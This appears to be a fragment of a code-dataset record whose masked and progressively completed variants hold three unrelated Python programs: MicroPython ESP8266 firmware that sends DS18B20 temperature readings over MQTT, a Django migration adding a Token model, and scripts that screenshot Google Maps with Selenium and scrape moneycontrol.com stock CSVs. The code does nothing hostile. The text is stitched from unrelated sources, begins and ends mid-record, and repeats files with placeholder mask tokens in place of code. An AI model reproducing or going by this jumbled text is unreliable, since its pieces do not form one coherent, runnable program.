"step-3": "<mask token>\n\n\nclass Error(Exception):\n pass\n\n\nclass Warning(Exception):\n pass\n\n\ndef gettimestr():\n rtc = machine.RTC()\n curtime = rtc.datetime()\n _time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2\n ] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]\n return _time\n\n\ndef deepsleep():\n rtc = machine.RTC()\n rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)\n rtc.alarm(rtc.ALARM0, 60000)\n machine.deepsleep()\n\n\n<mask token>\n\n\ndef timercallback(tim):\n global timer_index\n if timer_index == 0:\n print('Timer reached 0, something went wrong -> sleep.')\n deepsleep()\n print('Timer index ' + str(timer_index))\n timer_index = timer_index - 1\n\n\n<mask token>\nif stoppin.value() == 0:\n print('Pin down, stop')\nelse:\n try:\n tim = Timer(-1)\n tim.init(period=1000, mode=Timer.PERIODIC, callback=timercallback)\n try:\n f = open('config.json', 'r')\n config = ujson.loads(f.readall())\n except OSError as e:\n if e.args[0] == errno.MP_ENOENT or e.args[0] == errno.MP_EIO:\n print('I/O error({0}): {1}'.format(e.args[0], e.args[1]))\n raise Error\n ONEWIREPIN = config['ONEWIREPIN']\n dat = machine.Pin(ONEWIREPIN)\n ds = ds18x20.DS18X20(onewire.OneWire(dat))\n roms = ds.scan()\n print('found devices:', roms)\n if len(roms) > 0:\n ds.convert_temp()\n time.sleep_ms(750)\n print('Check wifi connection.')\n wifi = network.WLAN(network.STA_IF)\n i = 0\n while not wifi.isconnected():\n if i > 10:\n print('No wifi connection.')\n raise Warning\n print('.')\n time.sleep(1)\n i = i + 1\n try:\n print('Get time.')\n ntptime.settime()\n except OSError as e:\n if e.args[0] == errno.ETIMEDOUT:\n print(\"Timeout error, didn't get ntptime.\")\n if machine.reset_cause() != machine.DEEPSLEEP:\n raise Warning\n if e.args[0] == -2:\n print(\"DNS error, didn't get ntptime.\")\n if machine.reset_cause() != machine.DEEPSLEEP:\n raise Warning\n else:\n raise\n _time = gettimestr()\n print('Open MQTT connection.')\n c = MQTTClient('umqtt_client', config['MQTT_BROKER'])\n c.connect()\n if config['MEASURE_VOLTAGE']:\n adc = machine.ADC(0)\n voltage = adc.read()\n topic = 'raw/esp8266/' + ubinascii.hexlify(machine.unique_id()\n ).decode() + '/voltage'\n message = _time + ' ' + str(voltage)\n c.publish(topic, message)\n for rom in roms:\n print('topic ' + config['MQTT_TOPIC'] + ubinascii.hexlify(rom).\n decode())\n topic = config['MQTT_TOPIC'] + ubinascii.hexlify(rom).decode(\n ) + '/temperature'\n print(_time)\n print(ds.read_temp(rom))\n message = _time + ' ' + str(ds.read_temp(rom))\n c.publish(topic, message)\n c.disconnect()\n deepsleep()\n except Warning:\n deepsleep()\n except Error:\n print('Error({0}): {1}'.format(e.args[0], e.args[1]))\n",
"step-4": "import time\nimport machine\nfrom machine import Timer\nimport network\nimport onewire, ds18x20\nimport ujson\nimport ubinascii\nfrom umqtt.simple import MQTTClient\nimport ntptime\nimport errno\n\n\nclass Error(Exception):\n pass\n\n\nclass Warning(Exception):\n pass\n\n\ndef gettimestr():\n rtc = machine.RTC()\n curtime = rtc.datetime()\n _time = '%04d' % curtime[0] + '%02d' % curtime[1] + '%02d' % curtime[2\n ] + ' ' + '%02d' % curtime[4] + '%02d' % curtime[5]\n return _time\n\n\ndef deepsleep():\n rtc = machine.RTC()\n rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)\n rtc.alarm(rtc.ALARM0, 60000)\n machine.deepsleep()\n\n\ntimer_index = 20\n\n\ndef timercallback(tim):\n global timer_index\n if timer_index == 0:\n print('Timer reached 0, something went wrong -> sleep.')\n deepsleep()\n print('Timer index ' + str(timer_index))\n timer_index = timer_index - 1\n\n\nstoppin = machine.Pin(4, mode=machine.Pin.IN, pull=machine.Pin.PULL_UP)\nif stoppin.value() == 0:\n print('Pin down, stop')\nelse:\n try:\n tim = Timer(-1)\n tim.init(period=1000, mode=Timer.PERIODIC, callback=timercallback)\n try:\n f = open('config.json', 'r')\n config = ujson.loads(f.readall())\n except OSError as e:\n if e.args[0] == errno.MP_ENOENT or e.args[0] == errno.MP_EIO:\n print('I/O error({0}): {1}'.format(e.args[0], e.args[1]))\n raise Error\n ONEWIREPIN = config['ONEWIREPIN']\n dat = machine.Pin(ONEWIREPIN)\n ds = ds18x20.DS18X20(onewire.OneWire(dat))\n roms = ds.scan()\n print('found devices:', roms)\n if len(roms) > 0:\n ds.convert_temp()\n time.sleep_ms(750)\n print('Check wifi connection.')\n wifi = network.WLAN(network.STA_IF)\n i = 0\n while not wifi.isconnected():\n if i > 10:\n print('No wifi connection.')\n raise Warning\n print('.')\n time.sleep(1)\n i = i + 1\n try:\n print('Get time.')\n ntptime.settime()\n except OSError as e:\n if e.args[0] == errno.ETIMEDOUT:\n print(\"Timeout error, didn't get ntptime.\")\n if machine.reset_cause() != machine.DEEPSLEEP:\n raise Warning\n if e.args[0] == -2:\n print(\"DNS error, didn't get ntptime.\")\n if machine.reset_cause() != machine.DEEPSLEEP:\n raise Warning\n else:\n raise\n _time = gettimestr()\n print('Open MQTT connection.')\n c = MQTTClient('umqtt_client', config['MQTT_BROKER'])\n c.connect()\n if config['MEASURE_VOLTAGE']:\n adc = machine.ADC(0)\n voltage = adc.read()\n topic = 'raw/esp8266/' + ubinascii.hexlify(machine.unique_id()\n ).decode() + '/voltage'\n message = _time + ' ' + str(voltage)\n c.publish(topic, message)\n for rom in roms:\n print('topic ' + config['MQTT_TOPIC'] + ubinascii.hexlify(rom).\n decode())\n topic = config['MQTT_TOPIC'] + ubinascii.hexlify(rom).decode(\n ) + '/temperature'\n print(_time)\n print(ds.read_temp(rom))\n message = _time + ' ' + str(ds.read_temp(rom))\n c.publish(topic, message)\n c.disconnect()\n deepsleep()\n except Warning:\n deepsleep()\n except Error:\n print('Error({0}): {1}'.format(e.args[0], e.args[1]))\n",
"step-5": "import time\nimport machine\nfrom machine import Timer\nimport network\nimport onewire, ds18x20\nimport ujson\nimport ubinascii\nfrom umqtt.simple import MQTTClient\nimport ntptime\nimport errno\n\n#Thrown if an error that is fatal occurs,\n#stop measurement cycle.\nclass Error(Exception):\n pass\n\n#Thrown if an error that is not fatal occurs,\n#goes to deep sleep and continues as normal.\n#For example no wifi connection at this time.\nclass Warning(Exception):\n pass\n \ndef gettimestr():\n rtc=machine.RTC()\n curtime=rtc.datetime()\n _time=\"%04d\" % curtime[0]+ \"%02d\" % curtime[1]+ \"%02d\" % curtime[2]+\" \"+ \"%02d\" % curtime[4]+ \"%02d\" % curtime[5]\n return _time\n\ndef deepsleep():\n # configure RTC.ALARM0 to be able to wake the device\n rtc = machine.RTC()\n rtc.irq(trigger=rtc.ALARM0, wake=machine.DEEPSLEEP)\n\n # set RTC.ALARM0 to fire after 60 seconds (waking the device)\n rtc.alarm(rtc.ALARM0, 60000)\n\n # put the device to sleep\n machine.deepsleep()\n\ntimer_index=20\n\ndef timercallback(tim):\n global timer_index\n if timer_index==0:\n print(\"Timer reached 0, something went wrong -> sleep.\")\n deepsleep()\n print(\"Timer index \"+str(timer_index))\n timer_index=timer_index-1\n \n#check if gpio4 is pulled down\nstoppin = machine.Pin(4,mode=machine.Pin.IN,pull=machine.Pin.PULL_UP)\nif stoppin.value()==0:\n print(\"Pin down, stop\")\nelse:\n try:\n #normal loop\n\n tim = Timer(-1)\n tim.init(period=1000, mode=Timer.PERIODIC, callback=timercallback)\n\n try:\n f = open('config.json', 'r')\n config = ujson.loads(f.readall())\n except OSError as e:\n if e.args[0] == errno.MP_ENOENT or e.args[0] == errno.MP_EIO:\n print(\"I/O error({0}): {1}\".format(e.args[0], e.args[1]))\n raise Error\n\n # the device is on GPIOxx\n ONEWIREPIN = config['ONEWIREPIN']\n dat = machine.Pin(ONEWIREPIN)\n\n # create the onewire object\n ds = ds18x20.DS18X20(onewire.OneWire(dat))\n\n # scan for devices on the bus\n roms = ds.scan()\n print('found devices:', roms)\n if (len(roms)>0):\n ds.convert_temp()\n time.sleep_ms(750)\n\n # Check if we have wifi, and wait for connection if not.\n print(\"Check wifi connection.\")\n wifi = network.WLAN(network.STA_IF)\n i = 0\n while not wifi.isconnected():\n if (i>10):\n print(\"No wifi connection.\")\n raise Warning\n print(\".\")\n time.sleep(1)\n i=i+1\n\n try:\n print(\"Get time.\")\n ntptime.settime()\n except OSError as e:\n if e.args[0] == errno.ETIMEDOUT: #OSError: [Errno 110] ETIMEDOUT\n print(\"Timeout error, didn't get ntptime.\")\n #if we did not wake up from deep sleep\n #we cannot continue until we get correct time\n if (machine.reset_cause()!=machine.DEEPSLEEP):\n raise Warning\n if e.args[0] == -2: #OSError: dns error\n print(\"DNS error, didn't get ntptime.\")\n #if we did not wake up from deep sleep\n #we cannot continue until we get correct time\n if (machine.reset_cause()!=machine.DEEPSLEEP):\n raise Warning\n else:\n raise\n _time=gettimestr()\n \n\n print(\"Open MQTT connection.\")\n c = MQTTClient(\"umqtt_client\", config['MQTT_BROKER'])\n c.connect()\n\n #check battery voltage?\n if (config['MEASURE_VOLTAGE']):\n adc = machine.ADC(0)\n voltage = adc.read();\n topic=\"raw/esp8266/\"+ubinascii.hexlify(machine.unique_id()).decode()+\"/voltage\"\n message=_time+\" \"+str(voltage)\n c.publish(topic,message)\n\n #loop ds18b20 and send results to mqtt broker\n for rom in roms:\n print(\"topic \"+config['MQTT_TOPIC']+ubinascii.hexlify(rom).decode())\n topic=config['MQTT_TOPIC']+ubinascii.hexlify(rom).decode()+\"/temperature\"\n print(_time)\n print(ds.read_temp(rom))\n message=_time+' '+str(ds.read_temp(rom))\n c.publish(topic,message)\n\n c.disconnect()\n\n deepsleep()\n except Warning:\n deepsleep()\n except Error:\n print(\"Error({0}): {1}\".format(e.args[0], e.args[1]))\n \n",
"step-ids": [
4,
5,
6,
8,
9
]
}
|
[
4,
5,
6,
8,
9
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('votes', '0003_choice_votes')]
operations = [migrations.CreateModel(name='Token', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('token', models.CharField(editable=
False, max_length=6)), ('used', models.BooleanField(default=False,
editable=False))]), migrations.AlterField(model_name='choice', name
='votes', field=models.IntegerField(default=0, editable=False))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('votes', '0003_choice_votes')]
operations = [migrations.CreateModel(name='Token', fields=[('id',
models.AutoField(auto_created=True, primary_key=True, serialize=
False, verbose_name='ID')), ('token', models.CharField(editable=
False, max_length=6)), ('used', models.BooleanField(default=False,
editable=False))]), migrations.AlterField(model_name='choice', name
='votes', field=models.IntegerField(default=0, editable=False))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2016-11-17 14:47
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('votes', '0003_choice_votes'),
]
operations = [
migrations.CreateModel(
name='Token',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('token', models.CharField(editable=False, max_length=6)),
('used', models.BooleanField(default=False, editable=False)),
],
),
migrations.AlterField(
model_name='choice',
name='votes',
field=models.IntegerField(default=0, editable=False),
),
]
|
flexible
|
{
"blob_id": "781cb59fb9b6d22547fd4acf895457868342e125",
"index": 8290,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('votes', '0003_choice_votes')]\n operations = [migrations.CreateModel(name='Token', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('token', models.CharField(editable=\n False, max_length=6)), ('used', models.BooleanField(default=False,\n editable=False))]), migrations.AlterField(model_name='choice', name\n ='votes', field=models.IntegerField(default=0, editable=False))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('votes', '0003_choice_votes')]\n operations = [migrations.CreateModel(name='Token', fields=[('id',\n models.AutoField(auto_created=True, primary_key=True, serialize=\n False, verbose_name='ID')), ('token', models.CharField(editable=\n False, max_length=6)), ('used', models.BooleanField(default=False,\n editable=False))]), migrations.AlterField(model_name='choice', name\n ='votes', field=models.IntegerField(default=0, editable=False))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.10.3 on 2016-11-17 14:47\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('votes', '0003_choice_votes'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Token',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('token', models.CharField(editable=False, max_length=6)),\n ('used', models.BooleanField(default=False, editable=False)),\n ],\n ),\n migrations.AlterField(\n model_name='choice',\n name='votes',\n field=models.IntegerField(default=0, editable=False),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while True:
driver.get(
'https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0'
)
start = 'C://Users//Pathak//Downloads//chromedriver_win32'
df = str(counter)
gh = str(time.time())
ft = df + gh + '.png'
final = os.path.join(start, ft)
driver.get_screenshot_as_file(final)
counter += 1
sleep(20)
driver.quit()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
driver = webdriver.Chrome(executable_path=
'C:/Users/Pathak/Downloads/chromedriver_win32/chromedriver.exe')
counter = 0
while True:
driver.get(
'https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0'
)
start = 'C://Users//Pathak//Downloads//chromedriver_win32'
df = str(counter)
gh = str(time.time())
ft = df + gh + '.png'
final = os.path.join(start, ft)
driver.get_screenshot_as_file(final)
counter += 1
sleep(20)
driver.quit()
<|reserved_special_token_1|>
from selenium import webdriver
from time import sleep
import os.path
import time
import datetime
driver = webdriver.Chrome(executable_path=
'C:/Users/Pathak/Downloads/chromedriver_win32/chromedriver.exe')
counter = 0
while True:
driver.get(
'https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0'
)
start = 'C://Users//Pathak//Downloads//chromedriver_win32'
df = str(counter)
gh = str(time.time())
ft = df + gh + '.png'
final = os.path.join(start, ft)
driver.get_screenshot_as_file(final)
counter += 1
sleep(20)
driver.quit()
<|reserved_special_token_1|>
from selenium import webdriver
from time import sleep
import os.path
import time
import datetime
driver =webdriver.Chrome(executable_path=r'C:/Users/Pathak/Downloads/chromedriver_win32/chromedriver.exe')
counter=0
while True :
driver.get("https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0")
start='C://Users//Pathak//Downloads//chromedriver_win32'
df=str(counter);
gh=str(time.time())
ft=df+gh+'.png'
final=os.path.join(start,ft)
driver.get_screenshot_as_file(final)
counter+=1
sleep(20)
driver.quit()
|
flexible
|
{
"blob_id": "30e7fc169eceb3d8cc1a4fa6bb65d81a4403f2c7",
"index": 5800,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile True:\n driver.get(\n 'https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0'\n )\n start = 'C://Users//Pathak//Downloads//chromedriver_win32'\n df = str(counter)\n gh = str(time.time())\n ft = df + gh + '.png'\n final = os.path.join(start, ft)\n driver.get_screenshot_as_file(final)\n counter += 1\n sleep(20)\ndriver.quit()\n",
"step-3": "<mask token>\ndriver = webdriver.Chrome(executable_path=\n 'C:/Users/Pathak/Downloads/chromedriver_win32/chromedriver.exe')\ncounter = 0\nwhile True:\n driver.get(\n 'https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0'\n )\n start = 'C://Users//Pathak//Downloads//chromedriver_win32'\n df = str(counter)\n gh = str(time.time())\n ft = df + gh + '.png'\n final = os.path.join(start, ft)\n driver.get_screenshot_as_file(final)\n counter += 1\n sleep(20)\ndriver.quit()\n",
"step-4": "from selenium import webdriver\nfrom time import sleep\nimport os.path\nimport time\nimport datetime\ndriver = webdriver.Chrome(executable_path=\n 'C:/Users/Pathak/Downloads/chromedriver_win32/chromedriver.exe')\ncounter = 0\nwhile True:\n driver.get(\n 'https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0'\n )\n start = 'C://Users//Pathak//Downloads//chromedriver_win32'\n df = str(counter)\n gh = str(time.time())\n ft = df + gh + '.png'\n final = os.path.join(start, ft)\n driver.get_screenshot_as_file(final)\n counter += 1\n sleep(20)\ndriver.quit()\n",
"step-5": "from selenium import webdriver\r\nfrom time import sleep\r\nimport os.path\r\nimport time\r\nimport datetime\r\ndriver =webdriver.Chrome(executable_path=r'C:/Users/Pathak/Downloads/chromedriver_win32/chromedriver.exe')\r\ncounter=0\r\nwhile True :\r\n\t\r\n\r\n\tdriver.get(\"https://www.google.co.in/maps/@18.9967228,73.118955,21z/data=!5m1!1e1?hl=en&authuser=0\")\r\n\tstart='C://Users//Pathak//Downloads//chromedriver_win32'\r\n\tdf=str(counter);\r\n\tgh=str(time.time())\r\n\r\n\tft=df+gh+'.png'\r\n\tfinal=os.path.join(start,ft)\r\n\tdriver.get_screenshot_as_file(final) \r\n\tcounter+=1\r\n\t\r\n\tsleep(20)\r\n\r\ndriver.quit()\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python
from Tkinter import *
root = Tk()
root.title("Simple Graph")
root.resizable(0,0)
points = []
spline = 0
tag1 = "theline"
def point(event):
c.create_oval(event.x, event.y, event.x+1, event.y+1, fill="black", width="10.0")
points.append(event.x)
points.append(event.y)
print(event.x)
print(event.y)
return points
def canxy(event):
print("Getting the coordinates")
print event.x, event.y
c.create_oval(event.x, event.y, event.x+1, event.y+1, fill="red", width="20.0")
def graph(event):
global theline
c.create_line(points, tags="theline")
def toggle(event):
global spline
if spline == 0:
c.itemconfigure(tag1, smooth=1)
spline = 1
elif spline == 1:
c.itemconfigure(tag1, smooth=0)
spline = 0
return spline
c = Canvas(root, bg="white", width=300, height= 300)
c.configure(cursor="crosshair")
c.pack()
c.bind("<Button-1>", point)
#c.bind("<Button-3>", graph)
c.bind("<Button-3>", canxy)
#c.bind("<Button-2>", toggle)
root.mainloop()
|
normal
|
{
"blob_id": "d88485e37d4df4cb0c8d79124d4c9c9ba18d124e",
"index": 9074,
"step-1": "#!/usr/bin/python\nfrom Tkinter import *\n\nroot = Tk()\n\nroot.title(\"Simple Graph\")\n\nroot.resizable(0,0)\n\npoints = []\n\nspline = 0\n\ntag1 = \"theline\"\n\ndef point(event):\n\tc.create_oval(event.x, event.y, event.x+1, event.y+1, fill=\"black\", width=\"10.0\")\n\tpoints.append(event.x)\n\tpoints.append(event.y)\n\tprint(event.x)\n\tprint(event.y)\n\treturn points\n\ndef canxy(event):\n\tprint(\"Getting the coordinates\")\n\tprint event.x, event.y\n\tc.create_oval(event.x, event.y, event.x+1, event.y+1, fill=\"red\", width=\"20.0\")\n\ndef graph(event):\n\tglobal theline\n\tc.create_line(points, tags=\"theline\")\n\t\n\ndef toggle(event):\n\tglobal spline\n\tif spline == 0:\n\t\tc.itemconfigure(tag1, smooth=1)\n\t\tspline = 1\n\telif spline == 1:\n\t\tc.itemconfigure(tag1, smooth=0)\n\t\tspline = 0\n\treturn spline\n\n\nc = Canvas(root, bg=\"white\", width=300, height= 300)\n\nc.configure(cursor=\"crosshair\")\n\nc.pack()\n\nc.bind(\"<Button-1>\", point)\n\n#c.bind(\"<Button-3>\", graph)\nc.bind(\"<Button-3>\", canxy)\n#c.bind(\"<Button-2>\", toggle)\n\nroot.mainloop()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
class Node():
def __init__(self, value):
self.value = value
self.next = None
def linked_list_from_array(arr):
head = Node(arr[0])
cur = head
for i in range(1, len(arr)):
cur.next = Node(arr[i])
cur = cur.next
return head
def array_from_linked_list(head):
arr = []
cur = head
while cur:
arr.append(cur.value)
cur = cur.next
return arr
def reverse_linked_list(head):
prev = None
cur = head
while cur:
next = cur.next # save
cur.next = prev # assign next to prev
prev = cur
cur = next
return prev
array = [9, 1, 2, 3, 6, 8, 11, 5]
ll = linked_list_from_array(array)
rev_ll = reverse_linked_list(ll)
rev_array = array_from_linked_list(rev_ll)
print(array)
print(rev_array)
def reverse_linked_list_section(head, start, end):
pass
# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
# (0, 3) => [3, 2, 1, 0, 4, 5, 6, 7, 8, 9]
# (2, 4) => [0, 1, 4, 3, 2, 5, 6, 7, 8, 9]
# (6, 9) => [0, 1, 2, 3, 4, 5, 9, 8, 7, 6]
|
normal
|
{
"blob_id": "e1eb86480fa4eadabf05f10cc54ff9daa790438c",
"index": 3935,
"step-1": "class Node:\n\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\n<mask token>\n\n\ndef array_from_linked_list(head):\n arr = []\n cur = head\n while cur:\n arr.append(cur.value)\n cur = cur.next\n return arr\n\n\n<mask token>\n",
"step-2": "class Node:\n\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\ndef linked_list_from_array(arr):\n head = Node(arr[0])\n cur = head\n for i in range(1, len(arr)):\n cur.next = Node(arr[i])\n cur = cur.next\n return head\n\n\ndef array_from_linked_list(head):\n arr = []\n cur = head\n while cur:\n arr.append(cur.value)\n cur = cur.next\n return arr\n\n\ndef reverse_linked_list(head):\n prev = None\n cur = head\n while cur:\n next = cur.next\n cur.next = prev\n prev = cur\n cur = next\n return prev\n\n\n<mask token>\n",
"step-3": "class Node:\n\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\ndef linked_list_from_array(arr):\n head = Node(arr[0])\n cur = head\n for i in range(1, len(arr)):\n cur.next = Node(arr[i])\n cur = cur.next\n return head\n\n\ndef array_from_linked_list(head):\n arr = []\n cur = head\n while cur:\n arr.append(cur.value)\n cur = cur.next\n return arr\n\n\ndef reverse_linked_list(head):\n prev = None\n cur = head\n while cur:\n next = cur.next\n cur.next = prev\n prev = cur\n cur = next\n return prev\n\n\n<mask token>\nprint(array)\nprint(rev_array)\n\n\ndef reverse_linked_list_section(head, start, end):\n pass\n",
"step-4": "class Node:\n\n def __init__(self, value):\n self.value = value\n self.next = None\n\n\ndef linked_list_from_array(arr):\n head = Node(arr[0])\n cur = head\n for i in range(1, len(arr)):\n cur.next = Node(arr[i])\n cur = cur.next\n return head\n\n\ndef array_from_linked_list(head):\n arr = []\n cur = head\n while cur:\n arr.append(cur.value)\n cur = cur.next\n return arr\n\n\ndef reverse_linked_list(head):\n prev = None\n cur = head\n while cur:\n next = cur.next\n cur.next = prev\n prev = cur\n cur = next\n return prev\n\n\narray = [9, 1, 2, 3, 6, 8, 11, 5]\nll = linked_list_from_array(array)\nrev_ll = reverse_linked_list(ll)\nrev_array = array_from_linked_list(rev_ll)\nprint(array)\nprint(rev_array)\n\n\ndef reverse_linked_list_section(head, start, end):\n pass\n",
"step-5": "class Node():\n def __init__(self, value):\n self.value = value\n self.next = None\n\ndef linked_list_from_array(arr):\n head = Node(arr[0])\n cur = head\n \n for i in range(1, len(arr)):\n cur.next = Node(arr[i])\n cur = cur.next\n \n return head\n\ndef array_from_linked_list(head):\n arr = []\n cur = head\n\n while cur:\n arr.append(cur.value)\n cur = cur.next\n\n return arr\n\ndef reverse_linked_list(head):\n prev = None\n cur = head\n\n while cur:\n next = cur.next # save\n cur.next = prev # assign next to prev\n prev = cur\n cur = next\n\n return prev\n\narray = [9, 1, 2, 3, 6, 8, 11, 5]\nll = linked_list_from_array(array)\nrev_ll = reverse_linked_list(ll)\nrev_array = array_from_linked_list(rev_ll)\n\nprint(array)\nprint(rev_array)\n\ndef reverse_linked_list_section(head, start, end):\n pass\n\n# [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]\n# (0, 3) => [3, 2, 1, 0, 4, 5, 6, 7, 8, 9]\n# (2, 4) => [0, 1, 4, 3, 2, 5, 6, 7, 8, 9]\n# (6, 9) => [0, 1, 2, 3, 4, 5, 9, 8, 7, 6]\n\n",
"step-ids": [
3,
5,
7,
8,
9
]
}
|
[
3,
5,
7,
8,
9
] |
<|reserved_special_token_0|>
def historic_data(url):
csv_data = urllib2.urlopen(url)
csv_reader = list(csv.reader(csv_data, delimiter=','))
return csv_reader[-1]
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_last_element_timestamp(url):
conn = urllib2.urlopen(url)
html = conn.read()
soup = BeautifulSoup(html, 'lxml')
elements = soup.find_all('div')[-1]
return elements.text
def historic_data(url):
csv_data = urllib2.urlopen(url)
csv_reader = list(csv.reader(csv_data, delimiter=','))
return csv_reader[-1]
for page, url_value in url.items():
print(page, get_last_element_timestamp(url_value))
<|reserved_special_token_0|>
print('Historic csv infosys => BSE')
print(historic_data(bse_info_csv))
print('Historic csv of infosys => NSE')
print(historic_data(nse_info_csv))
print('Historic csv of sensex ')
print(historic_data(historic_sensex))
print('Historic csv of nifty')
print(historic_data(historic_nifty))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
url = {'Home ': 'https://www.moneycontrol.com/'}
def get_last_element_timestamp(url):
conn = urllib2.urlopen(url)
html = conn.read()
soup = BeautifulSoup(html, 'lxml')
elements = soup.find_all('div')[-1]
return elements.text
def historic_data(url):
csv_data = urllib2.urlopen(url)
csv_reader = list(csv.reader(csv_data, delimiter=','))
return csv_reader[-1]
for page, url_value in url.items():
print(page, get_last_element_timestamp(url_value))
bse_info_csv = 'http://www.moneycontrol.com/tech_charts/bse/his/it.csv'
nse_info_csv = 'http://www.moneycontrol.com/tech_charts/nse/his/it.csv'
historic_sensex = 'http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv'
historic_nifty = 'http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv'
print('Historic csv infosys => BSE')
print(historic_data(bse_info_csv))
print('Historic csv of infosys => NSE')
print(historic_data(nse_info_csv))
print('Historic csv of sensex ')
print(historic_data(historic_sensex))
print('Historic csv of nifty')
print(historic_data(historic_nifty))
<|reserved_special_token_1|>
import urllib2
import csv
from bs4 import BeautifulSoup
url = {'Home ': 'https://www.moneycontrol.com/'}
def get_last_element_timestamp(url):
conn = urllib2.urlopen(url)
html = conn.read()
soup = BeautifulSoup(html, 'lxml')
elements = soup.find_all('div')[-1]
return elements.text
def historic_data(url):
csv_data = urllib2.urlopen(url)
csv_reader = list(csv.reader(csv_data, delimiter=','))
return csv_reader[-1]
for page, url_value in url.items():
print(page, get_last_element_timestamp(url_value))
bse_info_csv = 'http://www.moneycontrol.com/tech_charts/bse/his/it.csv'
nse_info_csv = 'http://www.moneycontrol.com/tech_charts/nse/his/it.csv'
historic_sensex = 'http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv'
historic_nifty = 'http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv'
print('Historic csv infosys => BSE')
print(historic_data(bse_info_csv))
print('Historic csv of infosys => NSE')
print(historic_data(nse_info_csv))
print('Historic csv of sensex ')
print(historic_data(historic_sensex))
print('Historic csv of nifty')
print(historic_data(historic_nifty))
<|reserved_special_token_1|>
import urllib2
import csv
from bs4 import BeautifulSoup
url = {
"Home ": 'https://www.moneycontrol.com/',
# "Market": 'https://www.moneycontrol.com/stocksmarketsindia/',
# "Mf Home": 'https://www.moneycontrol.com/mutualfundindia/'
}
def get_last_element_timestamp(url):
conn = urllib2.urlopen(url)
html = conn.read()
soup = BeautifulSoup(html,"lxml")
elements = soup.find_all('div')[-1]
return elements.text
def historic_data(url):
csv_data = urllib2.urlopen(url)
csv_reader = list(csv.reader(csv_data, delimiter=','))
return (csv_reader[-1])
for page,url_value in url.items():
print (page,get_last_element_timestamp(url_value))
# print page
##
bse_info_csv="http://www.moneycontrol.com/tech_charts/bse/his/it.csv"
nse_info_csv = "http://www.moneycontrol.com/tech_charts/nse/his/it.csv"
historic_sensex = "http://www.moneycontrol.com/tech_charts/bse/his/sensex.csv"
historic_nifty = "http://www.moneycontrol.com/tech_charts/nse/his/nifty.csv"
print("Historic csv infosys => BSE")
print(historic_data(bse_info_csv))
print ("Historic csv of infosys => NSE")
print(historic_data(nse_info_csv))
print ("Historic csv of sensex ")
print(historic_data(historic_sensex))
print ("Historic csv of nifty")
print (historic_data(historic_nifty))
|
flexible
|
{
"blob_id": "81f75498afcca31e38ea7856c81c291af3ef6673",
"index": 7151,
"step-1": "<mask token>\n\n\ndef historic_data(url):\n csv_data = urllib2.urlopen(url)\n csv_reader = list(csv.reader(csv_data, delimiter=','))\n return csv_reader[-1]\n\n\n<mask token>\n",
